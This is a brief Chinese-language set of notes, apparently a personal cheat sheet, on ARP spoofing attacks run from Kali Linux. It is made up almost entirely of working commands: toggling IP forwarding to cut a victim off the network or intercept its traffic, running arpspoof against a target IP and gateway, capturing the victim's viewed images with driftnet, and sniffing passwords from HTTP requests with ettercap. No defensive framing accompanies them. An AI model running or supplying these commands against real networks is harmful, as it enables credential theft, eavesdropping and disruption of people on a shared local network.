关闭IP转发:echo 0 > /proc/sys/net/ipv4/ip_forward,用于断网攻击。
开启IP转发:echo 1 > /proc/sys/net/ipv4/ip_forward,用于截取数据。
arpspoof -i 网卡 -t 靶机IP 网关
例:arpspoof -i eth0 -t 192.168.1.8 192.168.1.1
应用:
1.获取靶机浏览图片。开启arp欺骗后,运行driftnet -i eth0即可。
2.获取密码。开启arp欺骗后,运行ettercap -Tq -i eth0,监视网页http请求,可看到密码等参数。
注:如果是kali虚拟机攻击物理机,可能导致网速过慢,而看不到效果,表现出断网攻击。